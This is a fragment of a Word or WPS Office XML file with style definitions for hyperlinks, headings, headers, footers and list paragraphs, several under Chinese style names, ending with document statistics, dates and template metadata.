    <w:rPr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FollowedHyperlink"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="Hyperlink"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="HTML Code"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="宋体" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="标题 1 Char"/>
    <w:link w:val="2"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6">
    <w:name w:val="标题 2 Char"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="批注框文本 Char"/>
    <w:link w:val="5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9">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="页眉 Char"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="b1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="m1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="pi1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="t1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="ns1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="tx1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="28">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="headline-content2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="font_big181"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr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771</Words>
  <Characters>1591</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1674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2014-11-27T04:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T06:32:41Z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8E7BB43CB0926E6B486EC566179E7264_43</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNzljMTIxMTNlMWM1OThkNmE0NDlkYzk0OTNhZTAwM2YiLCJ1c2VySWQiOiI3NTE2NDI3NzQifQ==</vt:lpwstr>
  </property>
</Properties>
</file>